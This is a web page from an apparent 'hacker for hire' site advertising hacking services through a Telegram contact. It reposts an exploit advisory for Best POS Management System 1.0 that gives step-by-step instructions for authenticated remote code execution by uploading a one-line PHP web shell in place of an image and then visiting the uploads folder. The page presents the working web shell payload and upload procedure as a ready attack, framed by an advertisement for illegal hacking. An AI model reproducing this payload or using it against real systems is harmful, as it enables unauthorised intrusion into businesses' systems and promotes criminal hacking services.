Data center: Ashburn, VA

Telegram Chat : MBHH_x86

Email Us:

Mobile Hacker For Hire, hire a hacker, hiring a hacker, hacker with proof

Best POS Management System 1.0 Shell Upload ≈ Mobile Hacker For Hire

Table of Contents

# Exploit Title: Authenticated Remote Code Execution on File Upload
# Google Dork: NA
# Date: 17/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Windows 11
# CVE : NA

### Steps to Reproduce

1- Login as Admin Rule

2- Head to ” http://localhost/kruxton/index.php?page=site_settings”

3- Try to Upload an image here it will be a shell.php



<?php system($_GET[‘cmd’]); ?>

4- Head to http://localhost/kruxton/assets/uploads/

5- Access your uploaded Shell

Leave a Reply

Your email address will not be published. Required fields are marked *

error: Content is protected !!